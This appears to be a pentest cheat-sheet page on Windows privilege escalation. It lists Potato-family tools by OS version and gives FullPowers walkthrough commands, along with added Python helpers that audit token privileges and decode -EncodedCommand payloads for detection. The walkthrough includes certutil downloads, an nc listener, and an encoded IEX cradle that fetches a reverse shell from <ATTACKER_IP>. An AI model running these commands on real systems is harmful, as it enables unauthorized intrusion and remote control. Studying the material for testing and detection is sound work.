PRIMARY CATEGORY → WINDOWS PRIVESC

Theory

Privesc Tool ↔ Windows OS Version

Windows Server

  OS VERSION             TOOL
  WS 2008 / WS 2008 R2   RottenPotato, LonelyPotato
  WS 2012 / WS 2012 R2   JuicyPotato
  WS 2016                JuicyPotato, PrintSpoofer
  WS 2019                PrintSpoofer, RoguePotato
  WS 2022                GodPotato, SigmaPotato

Windows Desktop

  OS VERSION             TOOL
  Windows 7 / 8 / 8.1    RottenPotato, JuicyPotato
  Windows 10 < 1809      JuicyPotato
  Windows 10 > 1809      PrintSpoofer, RoguePotato
  Windows 11             GodPotato, SigmaPotato

Enumeration

whoami /priv
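As an added example (not part of the original notes), the following Python helper parses a captured whoami /priv listing and reports which impersonation-class privileges the token holds. The point it makes for an auditor: a privilege shown as Disabled is still present on the token (the process can enable it itself), so it counts as held; only a privilege missing from the list is actually gone, which is the situation FullPowers addresses. The whoami /priv capture below is constructed, not taken from a real host.

```python
"""Audit a token's privileges for the impersonation-class ones.

Added example, not from the page. The `whoami /priv` capture is constructed.
"""
import re

# Privileges whose presence on a service account is what the Potato family
# and FullPowers build on; these are the ones an inventory should flag.
IMPERSONATION_PRIVS = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
}

# Constructed sample in the exact layout `whoami /priv` prints.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Disabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# One row: privilege name, free-text description, then Enabled/Disabled.
ROW_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text: str) -> dict:
    """Return {privilege_name: state} for every privilege row in the output."""
    privs = {}
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def impersonation_exposure(privs: dict) -> dict:
    """Which impersonation-class privileges the token holds, with their state.

    Disabled is not the same as absent: a Disabled privilege is still on the
    token and can be enabled by the process, so it is reported as held.
    """
    return {name: privs[name] for name in sorted(IMPERSONATION_PRIVS) if name in privs}


def is_impersonation_capable(privs: dict) -> bool:
    """True if the token holds any impersonation-class privilege at all."""
    return bool(impersonation_exposure(privs))


if __name__ == "__main__":
    parsed = parse_whoami_priv(SAMPLE_WHOAMI_PRIV)
    print(impersonation_exposure(parsed), is_impersonation_capable(parsed))
```

Feed it the output of whoami /priv collected from the account under review; an empty result from impersonation_exposure means the privileges have been stripped from the token, not merely disabled.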

Enabling Token Privileges

FullPowers

It is a PoC that automatically recovers the default privilege set of a service account, including SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege.

Setup
  • Downloading the binary

From the attacker ⚔️

curl --silent --location --request GET --remote-name 'https://github.com/itm4n/FullPowers/releases/download/v0.1/FullPowers.exe'
  • Downloading a TCP Reverse Shell

From the attacker ⚔️

curl --silent --location --request GET 'https://github.com/samratashok/nishang/raw/refs/heads/master/Shells/Invoke-PowerShellTcpOneLine.ps1' --output rev.ps1
  • Setting up the Reverse Shell (!$ expands to the last argument of the previous command, i.e. rev.ps1)

From the attacker ⚔️

nvim !$
  • Transferring it to the target

From the attacker ⚔️

python3 -m http.server 80

From the target 🎯

mkdir $env:systemroot\Temp\LPE
cd $env:systemroot\Temp\LPE
certutil.exe -urlcache -split -f http://<ATTACKER_IP>/FullPowers.exe
  • Setting up TCP Listener

From the attacker ⚔️

rlwrap -CaR nc -nlvp <ATTACKER_PORT>
  • Creating a base64-encoded powershell payload

To request the reverse shell resource over HTTP and evaluate its content

From the attacker ⚔️

echo -n 'IEX (New-Object Net.WebClient).downloadString("http://<ATTACKER_IP>/rev.ps1")' | iconv --from-code UTF-8 --to-code UTF-16LE | base64 -w 0 ; echo
  • Setting up an HTTP Server

From the attacker ⚔️

python3 -m http.server 80

Usage

From the target 🎯

.\FullPowers.exe -c 'powershell.exe -EncodedCommand SQBFAFgAIAAoAwBi...<SNIP>...'
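Added example, not from the original notes: the encoding step above (echo | iconv UTF-16LE | base64) reproduced in Python, together with the inverse an analyst applies when a -EncodedCommand argument shows up in a process-creation log. The encoder's output for the page's cradle starts with SQBFAFgAIAAo, the same prefix as the usage line above, which is a quick way to confirm a blob is UTF-16LE base64 rather than plain base64. The process command line in the block is constructed; <ATTACKER_IP> is left as the page's placeholder.

```python
"""Round-trip and triage of PowerShell -EncodedCommand payloads.

Added example, not the page's own code. The encoder is the page's
`iconv --to-code UTF-16LE | base64` pipeline; the decoder and triage side
is what gets applied to a logged command line. SAMPLE_CMDLINE is constructed.
"""
import base64
import re

# Substrings of the download-and-evaluate cradle a detection rule keys on.
CRADLE_INDICATORS = ("IEX", "Invoke-Expression", "Net.WebClient", "DownloadString")

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (PowerShell
# accepts unambiguous prefixes of parameter names, so all four forms occur).
ENCODED_ARG_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_command(command: str) -> str:
    """Base64 over the UTF-16LE bytes of the script, as -EncodedCommand expects."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Inverse of encode_command; tolerates base64 padding lost to log truncation."""
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-16-le")


def cradle_indicators(command: str) -> list:
    """Case-insensitive check for the cradle pieces, in CRADLE_INDICATORS order."""
    lowered = command.lower()
    return [ind for ind in CRADLE_INDICATORS if ind.lower() in lowered]


def triage_command_line(cmdline: str):
    """Return (decoded_command, indicators) for a command line carrying an
    encoded argument, or None when there is nothing to decode."""
    m = ENCODED_ARG_RE.search(cmdline)
    if not m:
        return None
    decoded = decode_command(m.group(1))
    return decoded, cradle_indicators(decoded)


# The cradle from the page, placeholder left as-is.
CRADLE = 'IEX (New-Object Net.WebClient).downloadString("http://<ATTACKER_IP>/rev.ps1")'

# Constructed process-creation command line of the shape the usage line produces.
SAMPLE_CMDLINE = "powershell.exe -EncodedCommand " + encode_command(CRADLE)


if __name__ == "__main__":
    print(encode_command(CRADLE)[:12])
    print(triage_command_line(SAMPLE_CMDLINE))
```

Run triage_command_line over the CommandLine field of process-creation events (Sysmon event 1 or Security 4688 with command-line auditing enabled); a non-empty indicator list on a decoded argument is the download cradle this page uses.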

Components